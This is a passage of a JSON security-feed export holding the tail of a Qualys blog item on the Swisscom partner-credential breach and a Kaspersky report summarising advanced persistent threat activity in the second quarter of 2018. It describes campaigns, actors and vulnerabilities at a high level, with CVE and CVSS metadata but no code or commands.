legitimate login credentials that Swisscom had granted to a trusted sales partner, a classic case of so-called vendor risk.\n\nSwisscom said it immediately blocked the unnamed partner\u2019s system access, and also took steps to \u201cbetter protect access to such non-sensitive personal data by third-party companies.\u201d \n\nThe changes include adopting \u201ctighter controls\u201d for partner access, and the automatic triggering of an alarm if unusual activity is detected. It will also be impossible to run high-volume queries for all customer information in the systems. And two-factor authentication will be introduced this year for all data access required by sales partners.\n\n\"Swisscom stresses that the system was not hacked and no sensitive data, such as passwords, conversation or payment data, was affected by the incident,\" reads the company's statement.\n\nIlia Kolochenko, CEO of High-Tech Bridge, [told Info Security Magazine](<https://www.infosecurity-magazine.com/news/swisscom-breach-hits-10-of-swiss/>) that vendor risk remains widely unacknowledged. \u201cCyber-criminals won't assault the castle, but will instead find a weak supplier with legitimate access to the crown jewels,\u201d he said.", "modified": "2018-02-09T15:20:40", "published": "2018-02-09T15:20:40", "id": "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "href": "https://blog.qualys.com/news/2018/02/09/intel-makes-spectre-patch-progress-while-adobe-grapples-with-latest-flash-bug", "type": "qualysblog", "title": "Intel Makes Spectre Patch Progress, while Adobe Grapples with Latest Flash Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securelist": [{"lastseen": "2018-07-10T10:32:20", "bulletinFamily": "blog", "cvelist": ["CVE-2016-4117", "CVE-2016-4171", "CVE-2018-4878", "CVE-2018-8174"], "description": "\n\nIn the second quarter of 2017, Kaspersky Lab's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.\n\nThese summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.\n\nIn terms of well-known groups, **Asian actors** were the most active by far.\n\nLazarus/BlueNoroff [was suspected](<https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/>) of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a [campaign against an online casino](<https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/>) in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a [warning](<https://www.us-cert.gov/ncas/analysis-reports/AR18-165A>) in June about a new version of Manuscrypt they call TYPEFRAME.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154452/180709-APT-Trends-report-Q2-2018-1.png>)\n\n_US-CERT alert on Manuscrypt/TYPEFRAME malware used by Lazarus_\n\nEven if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.\n\nPossibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft [was found](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group's capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day [announced](<http://blogs.360.cn/blog/cve-2018-8174-en/>) by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>).\n\nThe overlaps between Scarcruft and Darkhotel go back to 2016 when we [discovered](<https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/>) Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:\n\nOperation | Exploit | Actor \n---|---|--- \nDaybreak | CVE-2016-4171 | DarkHotel \nErebus | CVE-2016-4117 | Scarcruft \n \nDarkHotel's Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft's Operation Erebus focused primarily on South Korea.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154503/180709-APT-Trends-report-Q2-2018-2.png>)\n\nAnalysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker [was using URLMoniker](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim's computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: \"[The King is Dead. Long Live the King!](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)\".\n\nWe also observed some relatively quiet groups coming back with new activity. A noteworthy example is [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.\n\nStill, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an [analysis](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) on the EXIF to C2 mechanism used by this malware.\n\nThis campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.\n\n## **Activity of well-known groups**\n\nIt seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.\n\nThere is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we [observed](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>) new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154509/180709-APT-Trends-report-Q2-2018-3.png>)\n\nBut even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.\n\nOne of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.\n\n## **Newcomers and comebacks**\n\nEvery now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.\n\nOne good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.\n\nFollowing the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.\n\nWe also discovered a new low-sophistication set of activity we call Perfanly, which we couldn\u00b4t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.\n\nBetween June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.\n\n## **Final thoughts**\n\nThe combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the 'Chinese-speaking umbrella', as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.\n\nThe intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.\n\nOne interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries \u2013 some related to new relations with North Korea \u2013 held in Mongolia, and to the country's new role in the region.\n\nThere were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking [our latest analysis](<https://securelist.com/energetic-bear-crouching-yeti/85345/>) on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.\n\nTo recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn't believe this was an important issue.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kasperksy.com.", "modified": "2018-07-10T10:00:22", "published": "2018-07-10T10:00:22", "id": "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "href": "https://securelist.com/apt-trends-report-q2-2018/86487/", "type": "securelist", "title": "APT Trends Report Q2 2018", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}